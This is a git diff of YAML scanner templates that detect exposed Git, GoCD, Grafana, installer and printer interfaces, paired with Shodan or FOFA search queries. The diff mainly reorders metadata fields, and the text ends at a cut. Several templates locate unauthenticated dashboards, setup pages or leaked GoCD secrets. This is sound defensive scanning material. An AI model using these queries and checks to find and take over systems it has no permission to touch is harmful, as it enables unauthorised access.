b/http/misconfiguration/git-web-interface.yaml index 8b66874bf0..56af8a2970 100644 --- a/http/misconfiguration/git-web-interface.yaml +++ b/http/misconfiguration/git-web-interface.yaml @@ -5,15 +5,15 @@ info: author: dhiyaneshDK severity: low description: Git Web Interface is exposed. - metadata: - max-request: 1 - shodan-query: html:"git web interface version" - product: git - vendor: git-scm - tags: git,misconfig - classification: cpe: cpe:2.3:a:git-scm:git:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: git-scm + product: git + shodan-query: html:"git web interface version" + tags: git,misconfig + http: - method: GET path: @@ -28,4 +28,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220403c31aafe58705c14121b826ac2d6a13d267dfbb5355ad61b8210fd16ffa186022100a2454f0fca7cfcde9de095c333f15e42d0a55bf9d93a8ee20a169302402d9422:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a004730450220403c31aafe58705c14121b826ac2d6a13d267dfbb5355ad61b8210fd16ffa186022100a2454f0fca7cfcde9de095c333f15e42d0a55bf9d93a8ee20a169302402d9422:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/gitea-public-signup.yaml b/http/misconfiguration/gitea-public-signup.yaml index 2fa7a013bd..c346e462ad 100644 --- a/http/misconfiguration/gitea-public-signup.yaml +++ b/http/misconfiguration/gitea-public-signup.yaml @@ -9,16 +9,16 @@ info: reference: - https://www.youtube.com/watch?v=oHhofSj9lEM&t=157s - https://gitea.io/en-us/ + classification: + cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"Powered by Gitea" - product: gitea vendor: gitea + product: gitea + shodan-query: html:"Powered by Gitea" tags: misconfig,gitea - classification: - cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:* http: - method: GET path: @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c36a1791582268e8b3a23df0696ff11d3112806c7c12c646b10ca49fe148f06f02206c39ee25b316e1041ed0c00c3381f1a9be432515ec5b2085dbd0649fb236d8ec:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100c36a1791582268e8b3a23df0696ff11d3112806c7c12c646b10ca49fe148f06f02206c39ee25b316e1041ed0c00c3381f1a9be432515ec5b2085dbd0649fb236d8ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/gitlab/gitlab-public-repos.yaml b/http/misconfiguration/gitlab/gitlab-public-repos.yaml index 1457c855c7..4d2d1a80e2 100644 --- a/http/misconfiguration/gitlab/gitlab-public-repos.yaml +++ b/http/misconfiguration/gitlab/gitlab-public-repos.yaml @@ -7,15 +7,15 @@ info: reference: - https://twitter.com/ldionmarcil/status/1370052344562470922 - https://github.com/ldionmarcil/gitlab-unauth-parser - metadata: - max-request: 1 - shodan-query: http.title:"GitLab" - product: gitlab - vendor: gitlab - tags: gitlab,exposure,misconfig - classification: cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: gitlab + product: gitlab + shodan-query: http.title:"GitLab" + tags: gitlab,exposure,misconfig + http: - method: GET path: @@ -36,4 +36,4 @@ http: words: - "name_with_namespace" -# digest: 4b0a00483046022100db1456b7621cff9a0e9b23cec256889e1b2105c58ea97aaeaf719f1403c36ce7022100b8eb7341c2599e8983388219ce5c1cfa516e1b1895649d49186e795b14f052b5:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100db1456b7621cff9a0e9b23cec256889e1b2105c58ea97aaeaf719f1403c36ce7022100b8eb7341c2599e8983388219ce5c1cfa516e1b1895649d49186e795b14f052b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/gitlab/gitlab-public-signup.yaml b/http/misconfiguration/gitlab/gitlab-public-signup.yaml index 81072f95b4..85fc5bcf31 100644 --- a/http/misconfiguration/gitlab/gitlab-public-signup.yaml +++ b/http/misconfiguration/gitlab/gitlab-public-signup.yaml @@ -4,15 +4,15 @@ info: name: GitLab public signup author: pdteam,axrk severity: info - metadata: - max-request: 2 - shodan-query: http.title:"GitLab" - product: gitlab - vendor: gitlab - tags: gitlab,misconfig - classification: cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: gitlab + product: gitlab + shodan-query: http.title:"GitLab" + tags: gitlab,misconfig + http: - method: GET path: @@ -20,6 +20,7 @@ http: - "{{BaseURL}}/users/sign_up" stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -39,4 +40,5 @@ http: negative: true words: - '' -# digest: 4b0a00483046022100c7b6ba5ffe70452a7ec5263ab9276d0684c0ff800c028be0e74c5c8000852a90022100917c7b6b75a09d28467faef842e3236446f39d0908cd4818a3986ae4dd6d393e:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100c7b6ba5ffe70452a7ec5263ab9276d0684c0ff800c028be0e74c5c8000852a90022100917c7b6b75a09d28467faef842e3236446f39d0908cd4818a3986ae4dd6d393e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/gitlist-disclosure.yaml b/http/misconfiguration/gitlist-disclosure.yaml index f24c71a1a2..0595ac3a9d 100644 --- a/http/misconfiguration/gitlist-disclosure.yaml +++ b/http/misconfiguration/gitlist-disclosure.yaml @@ -5,15 +5,15 @@ info: author: dhiyaneshDK severity: low description: GitList is exposed. - metadata: - max-request: 1 - shodan-query: title:"GitList" - product: gitlist - vendor: gitlist - tags: gitlist,misconfig - classification: cpe: cpe:2.3:a:gitlist:gitlist:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: gitlist + product: gitlist + shodan-query: title:"GitList" + tags: gitlist,misconfig + http: - method: GET path: @@ -28,4 +28,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c246a38f6aae9fe626cd123a9f8bb5360f0cb00262758d307b7d89bace70144e022100cd1fc6b9458ab883a169bb2e25a827ddade8be40c96b85c0285cc3e970d3727d:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100c246a38f6aae9fe626cd123a9f8bb5360f0cb00262758d307b7d89bace70144e022100cd1fc6b9458ab883a169bb2e25a827ddade8be40c96b85c0285cc3e970d3727d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/global-traffic-statistics.yaml b/http/misconfiguration/global-traffic-statistics.yaml index 710507666f..5cb84dc370 100644 --- a/http/misconfiguration/global-traffic-statistics.yaml +++ b/http/misconfiguration/global-traffic-statistics.yaml @@ -5,16 +5,16 @@ info: author: tess severity: low description: Global Traffic Statistics page is exposed. + classification: + cpe: cpe:2.3:a:f5:big-ip_global_traffic_manager:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Global Traffic Statistics" - product: big-ip_global_traffic_manager vendor: f5 + product: big-ip_global_traffic_manager + shodan-query: title:"Global Traffic Statistics" tags: misconfig,global,exposure - classification: - cpe: cpe:2.3:a:f5:big-ip_global_traffic_manager:*:*:*:*:*:*:*:* http: - method: GET path: @@ -37,4 +37,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b775c84757259afdec43240a6f466e603c875bbc31415430559909a3f0c56e990220618c12727384029710c17534b61fad1cd778ea74c0df124e9e72b1993f7ce043:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100b775c84757259afdec43240a6f466e603c875bbc31415430559909a3f0c56e990220618c12727384029710c17534b61fad1cd778ea74c0df124e9e72b1993f7ce043:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/gocd/gocd-cruise-configuration.yaml b/http/misconfiguration/gocd/gocd-cruise-configuration.yaml index e4f3b4ffaf..cd767b384c 100644 --- a/http/misconfiguration/gocd/gocd-cruise-configuration.yaml +++ b/http/misconfiguration/gocd/gocd-cruise-configuration.yaml @@ -9,15 +9,15 @@ info: - https://attackerkb.com/assessments/9101a539-4c6e-4638-a2ec-12080b7e3b50 - https://blog.sonarsource.com/gocd-pre-auth-pipeline-takeover - https://twitter.com/wvuuuuuuuuuuuuu/status/1456316586831323140 - metadata: - max-request: 1 - shodan-query: http.title:"Create a pipeline - Go" html:"GoCD Version" - product: gocd - vendor: thoughtworks - tags: go,gocd,config,exposure,misconfig - classification: cpe: cpe:2.3:a:thoughtworks:gocd:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: thoughtworks + product: gocd + shodan-query: http.title:"Create a pipeline - Go" html:"GoCD Version" + tags: go,gocd,config,exposure,misconfig + http: - method: GET path: @@ -35,4 +35,5 @@ http: - "webhookSecret" - "tokenGenerationKey" condition: and -# digest: 4a0a00473045022100ac29afb87fd8ac872a0f7b942535bb3bf817074b934908847e337261e4192e3b022032bf9074f738ea01957b605f5c88f68efad27b85ab8d69ecb23fc5d0b0f73193:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100ac29afb87fd8ac872a0f7b942535bb3bf817074b934908847e337261e4192e3b022032bf9074f738ea01957b605f5c88f68efad27b85ab8d69ecb23fc5d0b0f73193:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/gocd/gocd-encryption-key.yaml b/http/misconfiguration/gocd/gocd-encryption-key.yaml index 75e0581ff4..f71a485c98 100644 --- a/http/misconfiguration/gocd/gocd-encryption-key.yaml +++ b/http/misconfiguration/gocd/gocd-encryption-key.yaml @@ -9,15 +9,15 @@ info: - https://attackerkb.com/assessments/9101a539-4c6e-4638-a2ec-12080b7e3b50 - https://blog.sonarsource.com/gocd-pre-auth-pipeline-takeover - https://twitter.com/wvuuuuuuuuuuuuu/status/1456316586831323140 - metadata: - max-request: 1 - shodan-query: http.title:"Create a pipeline - Go" html:"GoCD Version" - product: gocd - vendor: thoughtworks - tags: go,gocd,exposure,misconfig - classification: cpe: cpe:2.3:a:thoughtworks:gocd:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: thoughtworks + product: gocd + shodan-query: http.title:"Create a pipeline - Go" html:"GoCD Version" + tags: go,gocd,exposure,misconfig + http: - method: GET path: @@ -42,4 +42,5 @@ http: - type: regex regex: - "([a-z0-9]){32}" -# digest: 4a0a00473045022100c33be8766bce2376dde66ff40c65f89225bdfa03a076007034b7174095a9912e022014b9097f6923389b114d20dbe98e44d2644c12971b4c29dc9800e6046b1a9373:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100c33be8766bce2376dde66ff40c65f89225bdfa03a076007034b7174095a9912e022014b9097f6923389b114d20dbe98e44d2644c12971b4c29dc9800e6046b1a9373:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/gocd/gocd-unauth-dashboard.yaml b/http/misconfiguration/gocd/gocd-unauth-dashboard.yaml index 60973648ae..cfcbf85ee5 100644 --- a/http/misconfiguration/gocd/gocd-unauth-dashboard.yaml +++ b/http/misconfiguration/gocd/gocd-unauth-dashboard.yaml @@ -5,15 +5,15 @@ info: author: dhiyaneshDk severity: medium description: GoCd Dashboard is exposed. - metadata: - max-request: 1 - shodan-query: http.title:"Create a pipeline - Go" html:"GoCD Version" - product: gocd - vendor: thoughtworks - tags: go,gocd,unauth,misconfig - classification: cpe: cpe:2.3:a:thoughtworks:gocd:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: thoughtworks + product: gocd + shodan-query: http.title:"Create a pipeline - Go" html:"GoCD Version" + tags: go,gocd,unauth,misconfig + http: - method: GET path: @@ -33,4 +33,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205138b757ccc0742d887b97717a06383dd5ccfe5f0394ff3c193c4be652028887022100b791a416ff7c1da55813e25fbaed8b33cc7cc08e1d599a7a1bd42f10131ffacc:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502205138b757ccc0742d887b97717a06383dd5ccfe5f0394ff3c193c4be652028887022100b791a416ff7c1da55813e25fbaed8b33cc7cc08e1d599a7a1bd42f10131ffacc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/grafana-public-signup.yaml b/http/misconfiguration/grafana-public-signup.yaml index 86ff9ab4bf..4ba86ceb18 100644 --- a/http/misconfiguration/grafana-public-signup.yaml +++ b/http/misconfiguration/grafana-public-signup.yaml @@ -5,15 +5,15 @@ info: author: pdteam severity: medium description: Public Signup is enabled on Grafana. - metadata: - max-request: 1 - shodan-query: title:"Grafana" - product: grafana - vendor: grafana - tags: grafana,intrusive,misconfig - classification: cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: grafana + product: grafana + shodan-query: title:"Grafana" + tags: grafana,intrusive,misconfig + http: - raw: - | @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cd9ddfa8c2baf843acc831480d26b30f6b6def4ceea41aa31c1d77cfc01ff8c40221009ca95c5f33cc23f93870f8fd3732b58e09571c68925449b31fcebdc136fb8e32:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100cd9ddfa8c2baf843acc831480d26b30f6b6def4ceea41aa31c1d77cfc01ff8c40221009ca95c5f33cc23f93870f8fd3732b58e09571c68925449b31fcebdc136fb8e32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/graphql/graphql-playground.yaml b/http/misconfiguration/graphql/graphql-playground.yaml index 8ae3d478b6..fa8ccc07a1 100644 --- a/http/misconfiguration/graphql/graphql-playground.yaml +++ b/http/misconfiguration/graphql/graphql-playground.yaml @@ -6,16 +6,16 @@ info: severity: unknown reference: - https://github.com/graphql/graphql-playground + classification: + cpe: cpe:2.3:a:graphql:playground:*:*:*:*:node.js:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"GraphQL Playground" - product: playground vendor: graphql + product: playground + shodan-query: title:"GraphQL Playground" tags: misconfig,graphql - classification: - cpe: cpe:2.3:a:graphql:playground:*:*:*:*:node.js:*:*:* http: - method: GET path: @@ -37,4 +37,4 @@ http: status: - 200 -# digest: 4a0a0047304502202d61741c08f70714d01c829cdb9e46bca026f4fbb12a2d340e5f22c6a9f8db1d022100be0f2a08785ef366f0cfa8f4cd9be3c27edb8f4f65f4fbd5316fe18662a3c664:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202d61741c08f70714d01c829cdb9e46bca026f4fbb12a2d340e5f22c6a9f8db1d022100be0f2a08785ef366f0cfa8f4cd9be3c27edb8f4f65f4fbd5316fe18662a3c664:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/grav-register-admin.yaml b/http/misconfiguration/grav-register-admin.yaml index fb7974e4e8..48bc193137 100644 --- a/http/misconfiguration/grav-register-admin.yaml +++ b/http/misconfiguration/grav-register-admin.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDk severity: high description: Exposed Grav admin user register page. + classification: + cpe: cpe:2.3:a:getgrav:grav_admin:*:*:*:*:grav:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Grav Register Admin User" - product: grav_admin vendor: getgrav + product: grav_admin + shodan-query: title:"Grav Register Admin User" tags: grav,register,admin,misconfig - classification: - cpe: cpe:2.3:a:getgrav:grav_admin:*:*:*:*:grav:*:*:* http: - method: GET path: @@ -32,4 +32,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100fee93345e98c4b7f5f6b1346f747fae537d02194b62d3c9c653542d472b10d7a02200ad9542dc8d977f677e61266dc7d2aecb4d540ced8f44ec80086f6d8705f0916:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100fee93345e98c4b7f5f6b1346f747fae537d02194b62d3c9c653542d472b10d7a02200ad9542dc8d977f677e61266dc7d2aecb4d540ced8f44ec80086f6d8705f0916:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/h2o/h2o-dashboard.yaml b/http/misconfiguration/h2o/h2o-dashboard.yaml index c9de98e6d9..90df75e86b 100644 --- a/http/misconfiguration/h2o/h2o-dashboard.yaml +++ b/http/misconfiguration/h2o/h2o-dashboard.yaml @@ -6,16 +6,16 @@ info: severity: high description: | H2o dashboard by default has no authentication and can lead to RCE on the host. + classification: + cpe: cpe:2.3:a:h2o:h2o:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"H2O Flow" - product: h2o vendor: h2o + product: h2o + shodan-query: title:"H2O Flow" tags: misconfig,exposure,h2o,ml,unauth - classification: - cpe: cpe:2.3:a:h2o:h2o:*:*:*:*:*:*:*:* http: - method: GET path: @@ -23,6 +23,7 @@ http: redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word @@ -40,4 +41,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ee21c15fb3a2cb2198efd560f30f90f725fd4eb8ab56e8e0cca48143e5f8fb0602210094e9651f477ea39f953e7175ce6b94649516d10db3a2484797638c4dabc8bbed:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100ee21c15fb3a2cb2198efd560f30f90f725fd4eb8ab56e8e0cca48143e5f8fb0602210094e9651f477ea39f953e7175ce6b94649516d10db3a2484797638c4dabc8bbed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/haproxy-exporter-metrics.yaml b/http/misconfiguration/haproxy-exporter-metrics.yaml index 0b6afce018..13ead1420d 100644 --- a/http/misconfiguration/haproxy-exporter-metrics.yaml +++ b/http/misconfiguration/haproxy-exporter-metrics.yaml @@ -5,16 +5,16 @@ info: author: pussycat0x severity: low description: Haproxy metrics is exposed. + classification: + cpe: cpe:2.3:a:haproxy:haproxy:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"haproxy exporter" - product: haproxy vendor: haproxy + product: haproxy + shodan-query: title:"haproxy exporter" tags: haproxy,exposure,debug,misconfig - classification: - cpe: cpe:2.3:a:haproxy:haproxy:*:*:*:*:*:*:*:* http: - method: GET path: @@ -37,4 +37,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402200655ee70596afce87e1d8db4b3082d84aa6b0da7a5861afb56a96f843e11fb20022069d40c4579c0ab2134a278af489c32581bcc20920ef60ada17b6749c1c838b3d:922c64590222798bb761d5b6d8e72950 + +# digest: 490a0046304402200655ee70596afce87e1d8db4b3082d84aa6b0da7a5861afb56a96f843e11fb20022069d40c4579c0ab2134a278af489c32581bcc20920ef60ada17b6749c1c838b3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/helm-dashboard-exposure.yaml b/http/misconfiguration/helm-dashboard-exposure.yaml index b1e1288d53..d20af7961a 100644 --- a/http/misconfiguration/helm-dashboard-exposure.yaml +++ b/http/misconfiguration/helm-dashboard-exposure.yaml @@ -4,16 +4,16 @@ info: name: Helm Dashboard - Exposure author: DhiyaneshDk severity: medium + classification: + cpe: cpe:2.3:a:helm:helm:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.favicon.hash:-594722214 - product: helm vendor: helm + product: helm + shodan-query: http.favicon.hash:-594722214 tags: helm,exposure,dashboard,misconfig - classification: - cpe: cpe:2.3:a:helm:helm:*:*:*:*:*:*:*:* http: - method: GET path: @@ -29,4 +29,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200c928d3466fb2afc7ef3a518d29bf10ebf5fd16c91a849dacf733fe69d35f371022100c8c2066577de94aad09b500fcb4c77b506257299d6a97b8cda35db7983d14fe9:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502200c928d3466fb2afc7ef3a518d29bf10ebf5fd16c91a849dacf733fe69d35f371022100c8c2066577de94aad09b500fcb4c77b506257299d6a97b8cda35db7983d14fe9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/hfs-exposure.yaml b/http/misconfiguration/hfs-exposure.yaml index 5d656e450e..3fa455f8b5 100644 --- a/http/misconfiguration/hfs-exposure.yaml +++ b/http/misconfiguration/hfs-exposure.yaml @@ -4,16 +4,16 @@ info: name: HFS Exposure author: tess severity: unknown + classification: + cpe: cpe:2.3:a:rejetto:http_file_server:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"HFS /" - product: http_file_server vendor: rejetto + product: http_file_server + shodan-query: title:"HFS /" tags: misconfig,hfs,exposure - classification: - cpe: cpe:2.3:a:rejetto:http_file_server:*:*:*:*:*:*:*:* http: - method: GET path: @@ -37,4 +37,4 @@ http: status: - 200 -# digest: 4a0a004730450221009c93d685673dae37425f299006a5cc6265d6e90c9190eee3f515dcef66b599d402206dc49172d96ff4f03df26148a45305ed49c4523fe56517c7c4c24db3d52d1bb2:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221009c93d685673dae37425f299006a5cc6265d6e90c9190eee3f515dcef66b599d402206dc49172d96ff4f03df26148a45305ed49c4523fe56517c7c4c24db3d52d1bb2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/hp/unauthorized-printer-hp.yaml b/http/misconfiguration/hp/unauthorized-printer-hp.yaml index 2edb5cb765..4c1b39b642 100644 --- a/http/misconfiguration/hp/unauthorized-printer-hp.yaml +++ b/http/misconfiguration/hp/unauthorized-printer-hp.yaml @@ -5,15 +5,15 @@ info: author: pussycat0x,r3naissance severity: high description: HP office pro printer web access is exposed. - metadata: - max-request: 2 - shodan-query: http.title:"Hp Officejet pro" - product: officejet_pro_8730_m9l80a - vendor: hp - tags: hp,iot,unauth,misconfig - classification: cpe: cpe:2.3:h:hp:officejet_pro_8730_m9l80a:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: hp + product: officejet_pro_8730_m9l80a + shodan-query: http.title:"Hp Officejet pro" + tags: hp,iot,unauth,misconfig + http: - method: GET path: @@ -29,4 +29,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022036d37039d912ae59424a671dd9c349844585972c295d1f7acf85d745b211afb1022100976c9be00188085d703986b94ef6b8c11cf10ec28e9772b729eadded1dac8181:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022036d37039d912ae59424a671dd9c349844585972c295d1f7acf85d745b211afb1022100976c9be00188085d703986b94ef6b8c11cf10ec28e9772b729eadded1dac8181:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/ibm-friendly-path-exposure.yaml b/http/misconfiguration/ibm-friendly-path-exposure.yaml index a38e63f162..b1729cb9ac 100644 --- a/http/misconfiguration/ibm-friendly-path-exposure.yaml +++ b/http/misconfiguration/ibm-friendly-path-exposure.yaml @@ -7,15 +7,15 @@ info: description: Finds friendly path exposed that can be used to access signup page and create new user accounts. reference: - https://clarkvoss.medium.com/how-to-harpon-big-blue-c163722638d8 - metadata: - max-request: 5 - shodan-query: http.html:"IBM WebSphere Portal" - product: websphere_portal - vendor: ibm - tags: ibm,exposure,websphere,misconfig - classification: cpe: cpe:2.3:a:ibm:websphere_portal:*:*:*:*:*:*:*:* + metadata: + max-request: 5 + vendor: ibm + product: websphere_portal + shodan-query: http.html:"IBM WebSphere Portal" + tags: ibm,exposure,websphere,misconfig + http: - method: GET path: @@ -49,4 +49,5 @@ http: regex: - "Content-Location: .+" negative: true -# digest: 490a0046304402201c5eb880703621112635885e53f9cfafcbb265895a9e6e3e0566c4145a9219460220209f7384c05171450191229a29dea42cff94633d4cf821765179db3bed060082:922c64590222798bb761d5b6d8e72950 + +# digest: 490a0046304402201c5eb880703621112635885e53f9cfafcbb265895a9e6e3e0566c4145a9219460220209f7384c05171450191229a29dea42cff94633d4cf821765179db3bed060082:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/activecollab-installer.yaml b/http/misconfiguration/installer/activecollab-installer.yaml index ac397b505a..17efe378aa 100644 --- a/http/misconfiguration/installer/activecollab-installer.yaml +++ b/http/misconfiguration/installer/activecollab-installer.yaml @@ -8,16 +8,16 @@ info: Detects exposed ActiveCollab Installation page. reference: - https://activecollab.com/ + classification: + cpe: cpe:2.3:a:activecollab:activecollab:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"ActiveCollab Installer" - product: activecollab vendor: activecollab + product: activecollab + shodan-query: html:"ActiveCollab Installer" tags: misconfig,install,exposure,activecollab - classification: - cpe: cpe:2.3:a:activecollab:activecollab:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +33,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022034b524d9ad8e4a38f42b3f47439047de2cdf505cea9c303acbcf771f8620210e02200e0c6e8c487c6c1d0d03d1b140b0914cd8e9df100b051d57a6c5f2047d14b2fa:922c64590222798bb761d5b6d8e72950 + +# digest: 490a00463044022034b524d9ad8e4a38f42b3f47439047de2cdf505cea9c303acbcf771f8620210e02200e0c6e8c487c6c1d0d03d1b140b0914cd8e9df100b051d57a6c5f2047d14b2fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/adguard-installer.yaml b/http/misconfiguration/installer/adguard-installer.yaml index c8cd375caf..5c7ceec039 100644 --- a/http/misconfiguration/installer/adguard-installer.yaml +++ b/http/misconfiguration/installer/adguard-installer.yaml @@ -6,16 +6,16 @@ info: severity: high description: | AdGuard Installation panel has been exposed. - metadata: - max-request: 1 - verified: true - fofa-query: title="Setup AdGuard Home" - product: adguard - vendor: adguard - tags: adguard,misconfig,install - classification: cpe: cpe:2.3:a:adguard:adguard:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: adguard + product: adguard + fofa-query: title="Setup AdGuard Home" + tags: adguard,misconfig,install + http: - method: GET path: @@ -31,4 +31,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f8a5710c842b60de55abc85e4049c343b837a0ada6f830040985caddfd526346022051d746f4754b723bce5d892a7a8f118ff7dde18894b91679a8e663ce25e79e8b:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100f8a5710c842b60de55abc85e4049c343b837a0ada6f830040985caddfd526346022051d746f4754b723bce5d892a7a8f118ff7dde18894b91679a8e663ce25e79e8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/alma-installer.yaml b/http/misconfiguration/installer/alma-installer.yaml index cc7441efa2..e31e8fb3f7 100644 --- a/http/misconfiguration/installer/alma-installer.yaml +++ b/http/misconfiguration/installer/alma-installer.yaml @@ -5,16 +5,16 @@ info: author: DhiyaneshDK severity: high description: Alma is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:almapay:alma:*:*:*:*:wordpress:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Alma Installation" - product: alma vendor: almapay + product: alma + shodan-query: title:"Alma Installation" tags: misconfig,alma,install,exposure - classification: - cpe: cpe:2.3:a:almapay:alma:*:*:*:*:wordpress:*:*:* http: - method: GET path: @@ -35,4 +35,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c6250654d85fbaf80fbfeb1011ad7902c233e811ca4b2ecd51079239fd1d4998022100f44bc592a98719ffc09c63d53bbc99ce6798630a5618ca1693cf6aa6fda70b84:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100c6250654d85fbaf80fbfeb1011ad7902c233e811ca4b2ecd51079239fd1d4998022100f44bc592a98719ffc09c63d53bbc99ce6798630a5618ca1693cf6aa6fda70b84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/ampache-music-installer.yaml b/http/misconfiguration/installer/ampache-music-installer.yaml index 19e379ee9c..e571de098c 100644 --- a/http/misconfiguration/installer/ampache-music-installer.yaml +++ b/http/misconfiguration/installer/ampache-music-installer.yaml @@ -5,16 +5,16 @@ info: author: tess severity: high description: Ampache Music is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:ampache:ampache:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"For the Love of Music - Installation" - product: ampache vendor: ampache + product: ampache + shodan-query: title:"For the Love of Music - Installation" tags: misconfig,ampache,install,exposure - classification: - cpe: cpe:2.3:a:ampache:ampache:*:*:*:*:*:*:*:* http: - method: GET path: @@ -37,4 +37,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220605ea50cd6b226cdbce1435b6626cd250bc67ac9f560eece87174fc44f6f93b20220135a1b12364086757ef627dd5560776ee8ba1cff657acf8cc6204cfb783bb52a:922c64590222798bb761d5b6d8e72950 + +# digest: 490a004630440220605ea50cd6b226cdbce1435b6626cd250bc67ac9f560eece87174fc44f6f93b20220135a1b12364086757ef627dd5560776ee8ba1cff657acf8cc6204cfb783bb52a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/misconfiguration/installer/atlassian-bamboo-setup-wizard.yaml b/http/misconfiguration/installer/atlassian-bamboo-setup-wizard.yaml index b4bfd9966b..a887105bc7 100644 --- a/http/misconfiguration/installer/atlassian-bamboo-setup-wizard.yaml +++ b/http/misconfiguration/installer/atlassian-bamboo-setup-wizard.yaml @@ -5,16 +5,16 @@ info: author: pussycat0x severity: info description: Atlassian Bamboo is susceptible to the Installation page exposure due to misconfiguration. + classification: + cpe: cpe:2.3:a:atlassian:bamboo:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Bamboo setup wizard" - product: bamboo vendor: atlassian + product: bamboo + shodan-query: title:"Bamboo setup wizard" tags: misconfig,atlassian,bamboo,setup,installer - classification: - cpe: cpe:2.3:a:atlassian:bamboo:*:*:*:*:*:*:*:* http: - method: GET path: @@ -36,4 +36,5 @@ http: - type: status status: - 200 -# digest: 